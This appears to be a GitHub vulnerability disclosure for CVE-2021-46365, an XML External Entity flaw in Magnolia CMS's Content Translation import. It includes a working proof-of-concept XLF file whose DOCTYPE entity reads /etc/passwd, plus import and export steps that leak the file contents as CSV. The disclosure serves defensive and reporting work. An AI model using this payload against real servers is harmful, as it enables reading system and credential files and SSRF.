Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2021-46365-Unsafe XML Parsing-Magnolia CMS/
Disclosures/CVE-2021-46365-Unsafe XML Parsing-Magnolia CMS/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

CVE-2021-46365: XML External Entity in Content Translation in Magnolia CMS

In Magnolia (versions <=6.2.3) when importing ".XLF" files in the "Content Translation" module, if the XLF contains malicious XML "DOCTYPE" entities, these can be used to:

  • Read arbitrary files by using the "file:" protocol and the "Export" function
  • Perform Server-Side Request Forgery (SSRF) attacks

Vendor Disclosure:

The vendor's disclosure and fix for this vulnerability can be found here.

Requirements:

This vulnerability requires:

  • Valid user credentials

Proof Of Concept:

The following XLF file was used to import the content of the “/etc/passwd” file into the translation:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE note [<!ENTITY sp SYSTEM "file:///etc/passwd"> ]>
<xliff xmlns="urn:oasis:names:tc:xliff:document:1.2" version="1.2">
    <file datatype="html" original="magnolia.export" source-language="en" target-language="de">
        <header/>
        <body>
            <trans-unit extradata="2015.10.27 11:41:44 110" id="05872876-073e-40a3-a3c5-0d0a18c1d43d:title" resname="Page properties: Page title">
                <source xml:lang="en">&sp;</source>
                <target xml:lang="de"/>
                <note>http://travel-demo.magnolia-cms.com/tour-type.html</note>
            </trans-unit>
            <trans-unit extradata="2015.10.27 11:41:44 110" id="05872876-073e-40a3-a3c5-0d0a18c1d43d:navigationTitle" resname="Page properties: Navigation title">
                <source xml:lang="en">Tours</source>
                <target xml:lang="de"/>
                <note>http://travel-demo.magnolia-cms.com/tour-type.html</note>
            </trans-unit>
        </body>
    </file>
</xliff>

Note: The XLF/XML file can be found here for easy download.

We import the above XLF into a translation and then we can immediately export the respective translation in order to obtain the contents of "/etc/passwd".

Import:

Export (any format can be used for the export, but in this case, CSV is used):

Resulting CSV containing "/etc/passwd":